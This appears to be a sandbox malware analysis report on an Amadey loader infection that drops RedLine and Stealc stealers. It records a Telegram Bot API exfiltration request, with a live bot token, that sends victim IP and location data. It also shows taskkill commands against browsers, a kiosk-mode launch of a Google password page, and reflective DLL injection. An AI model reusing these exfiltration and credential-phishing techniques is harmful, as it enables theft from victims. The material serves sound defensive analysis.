2024-12-12 15:48:31 UTC	513	OUT	GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1 User-Agent: TelegramBot Host: api.telegram.org Cache-Control: no-cache
2024-12-12 15:48:31 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 12 Dec 2024 15:48:31 GMT Content-Type: application/json Content-Length: 776 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-12 15:48:31 UTC	776	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c Data Ascii: {"ok":true,"result":{"message_id":3302,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49920	149.154.167.220	443	1528	C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:33 UTC	513	OUT	GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1 User-Agent: TelegramBot Host: api.telegram.org Cache-Control: no-cache
2024-12-12 15:48:33 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 12 Dec 2024 15:48:33 GMT Content-Type: application/json Content-Length: 776 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-12 15:48:33 UTC	776	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c Data Ascii: {"ok":true,"result":{"message_id":3303,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",

Target ID:	0
Start time:	10:46:59
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x240000
File size:	3'189'248 bytes
MD5 hash:	AD7F121646AA374AF133772519375710
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:47:03
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xfb0000
File size:	3'189'248 bytes
MD5 hash:	AD7F121646AA374AF133772519375710
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:47:04
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xfb0000
File size:	3'189'248 bytes
MD5 hash:	AD7F121646AA374AF133772519375710
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:48:00
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xfb0000
File size:	3'189'248 bytes
MD5 hash:	AD7F121646AA374AF133772519375710
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:48:12
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"
Imagebase:	0x7ff643f20000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:48:14
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
Imagebase:	0x7ff643f20000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:48:18
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"
Imagebase:	0x7ff684560000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:48:23
Start date:	12/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff711d40000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:48:25
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"
Imagebase:	0x7ff61dd60000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:48:25
Start date:	12/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff711d40000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	10:48:29
Start date:	12/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff711d40000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	10:48:31
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe"
Imagebase:	0x7ff68e690000
File size:	308'224 bytes
MD5 hash:	FF1E7643A5C9294BD8E8FD743B323C8F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:48:31
Start date:	12/12/2024
Path:	C:\Windows\System32\audiodg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\audiodg.exe"
Imagebase:	0x7ff6dab80000
File size:	632'808 bytes
MD5 hash:	627DEA21175691FDE4495877C53B4C87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	10:48:31
Start date:	12/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\msiexec.exe"
Imagebase:	0x7ff6bcbd0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	10:48:31
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\svchost.exe"
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	10:48:31
Start date:	12/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000014.00000000.2216112963.00000000089A0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	10:48:32
Start date:	12/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff711d40000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	10:48:39
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe"
Imagebase:	0x400000
File size:	1'985'024 bytes
MD5 hash:	5A3F6AA1107D91BDC0430E2A0C1F4F26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:48:40
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe"
Imagebase:	0x7ff61b980000
File size:	308'224 bytes
MD5 hash:	FF1E7643A5C9294BD8E8FD743B323C8F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:48:40
Start date:	12/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\msiexec.exe"
Imagebase:	0x7ff6bcbd0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:48:40
Start date:	12/12/2024
Path:	C:\Windows\System32\audiodg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\audiodg.exe"
Imagebase:	0x7ff6dab80000
File size:	632'808 bytes
MD5 hash:	627DEA21175691FDE4495877C53B4C87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:48:40
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\svchost.exe"
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:48:47
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe"
Imagebase:	0x560000
File size:	970'752 bytes
MD5 hash:	E477E0C89BDFE4F98170878F85624A0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:48:48
Start date:	12/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff711d40000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	10:48:49
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xc20000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:48:49
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:48:51
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
Imagebase:	0x7ff7f4260000
File size:	5'915'948 bytes
MD5 hash:	AE2A4249C8389603933DF4F806546C96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:48:52
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0xc20000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:48:52
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:48:52
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0xc20000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:48:52
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:48:52
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0xc20000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:48:52
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:48:53
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe"
Imagebase:	0xe50000
File size:	307'712 bytes
MD5 hash:	F0AAF1B673A9316C4B899CCC4E12D33E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe, Author: Joe Security
Antivirus matches:	Detection: 68%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:48:53
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
Imagebase:	0x7ff7f4260000
File size:	5'915'948 bytes
MD5 hash:	AE2A4249C8389603933DF4F806546C96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:48:53
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0xc20000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:48:54
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:48:55
Start date:	12/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff613480000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	10:48:55
Start date:	12/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff613480000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000002B.00000002.2491500061.000002392DCA0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000002B.00000002.2489426233.000002392C270000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:48:55
Start date:	12/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff613480000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000002C.00000002.2615996030.00000144AA140000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000002C.00000002.2615892313.00000144AA0F0000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:48:57
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe"
Imagebase:	0x3d0000
File size:	1'807'360 bytes
MD5 hash:	CD917C036DA4DC2B3E30E12B135A87E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002D.00000003.2490452576.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32.7%
Total number of Nodes:	594
Total number of Limit Nodes:	10

Executed Functions

Function 00245C83 Relevance: 20.8, APIs: 3, Strings: 8, Instructions: 1535
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,88D95C5C,88D95C5C), ref: 00245DCC
RegQueryValueExA.KERNEL32(88D95C5C,?,00000000,00000000,?,00000400,?,?,00000000,00000001,88D95C5C,88D95C5C), ref: 00245DFA
RegCloseKey.KERNEL32(88D95C5C,?,?,00000000,00000001,88D95C5C,88D95C5C), ref: 00245E06

Strings

00000423, xrefs: 002460FA
00000422, xrefs: 002460C9
00000419, xrefs: 00246098
Keyboard Layout\Preload, xrefs: 00246054
invalid stoi argument, xrefs: 00247090
VUUU, xrefs: 00246F41
stoi argument out of range, xrefs: 00247081
0000043f, xrefs: 0024612B

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
